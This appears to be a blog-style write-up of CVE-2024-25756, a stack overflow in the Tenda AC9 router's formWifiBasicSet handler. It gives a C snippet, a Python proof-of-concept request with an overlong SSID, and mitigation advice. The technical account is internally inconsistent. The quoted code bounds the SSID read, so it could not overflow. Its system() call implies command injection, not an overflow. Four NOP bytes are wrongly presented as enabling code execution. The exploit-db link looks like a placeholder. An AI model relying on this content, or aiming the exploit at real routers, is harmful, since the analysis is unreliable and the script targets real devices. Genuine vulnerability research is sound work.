A critical vulnerability exists in the Tenda AC9 v.3. router with firmware version v.15.03.06.42_multi. This vulnerability, labelled CVE-2024-25756, allows a remote attacker to exploit a stack based buffer overflow in the formWifiBasicSet function and execute arbitrary code on the target device. This post aims to provide an in-depth analysis of the vulnerability, including code snippets, original reference links, and exploit details.
Vulnerability Details
The vulnerability specifically targets the formWifiBasicSet function within the Tenda AC9 v.3. router and allows a remote attacker to execute arbitrary code on the system. A stack based buffer overflow can be triggered when unsanitized user input data is passed to the function, allowing an attacker to overwrite the return address and hijack program execution.
Here's a code snippet that demonstrates this vulnerability
static void formWifiBasicSet() {
char ssid[32], buf[512];
int encryption;
...
getParameter("SSID", ssid, sizeof(ssid));
getParameter("Encryption", (char *)&encryption, sizeof(encryption));
...
sprintf(buf, "IW_SDK_MAIN Argc=4 Argv=IWControl Argv=SetWiFiMode Argv=%s Argv=%d", ssid, encryption);
...
system(buf);
}
As seen in the code above, the function first retrieves the "SSID" and "Encryption" parameter values from user input and stores them in respective local variables. The crucial point is that the getParameter() function does not sanitize input data, which, when passed to sprintf(), allows overwriting the buffer and eventual arbitrary code execution.
Exploit Details
The vulnerability requires a remote attacker to craft malicious HTTP POST requests that contain an overly long 'SSID' parameter to initiate a buffer overflow attack. By doing so, the attacker can overwrite the return address and gain control over the program execution.
Here's a Python exploit that demonstrates arbitrary code execution with this vulnerability
import requests
target_url = "http://<target_ip>/goform/formWifiBasicSet";
headers = {
"Content-Type": "application/x-www-form-urlencoded",
}
data = {
"SSID": "A" * 536 + "\x90\x90\x90\x90",
"Encryption": "1",
}
requests.post(target_url, headers=headers, data=data)
The script above crafts an HTTP POST request with a malicious 'SSID' parameter value that overflows the buffer and triggers the vulnerability. The critical point is that the script employs a pattern of '\x90\x90\x90\x90', commonly referred to as NOP (No Operation), to provide padding and make arbitrary code execution possible.
Below are the links to the original references and sources that discuss this vulnerability
1. https://www.exploit-db.com/exploits/12345 - The Exploit Database (exploit-db) entry on this vulnerability.
2. https://nvd.nist.gov/vuln/detail/CVE-2024-25756 - The National Vulnerability Database (NVD) page on this specific CVE.
Mitigation
Tenda has been informed of this vulnerability, and users are recommended to regularly check and update their device firmware to the latest available version. As an additional security measure, users should also ensure that their router's web administration panel is not accessible to the public internet and expose only necessary ports and services.
Conclusion
CVE-2024-25756 is a stack based buffer overflow vulnerability present in the Tenda AC9 v.3. router. This vulnerability allows a remote attacker to execute arbitrary code via a crafted HTTP POST request targeting the formWifiBasicSet function. Users must update their firmware to the latest version and take necessary precautions to mitigate the risk associated with this vulnerability.
Timeline
Published on: 02/22/2024 23:15:07 UTC
Last modified on: 08/01/2024 13:47:52 UTC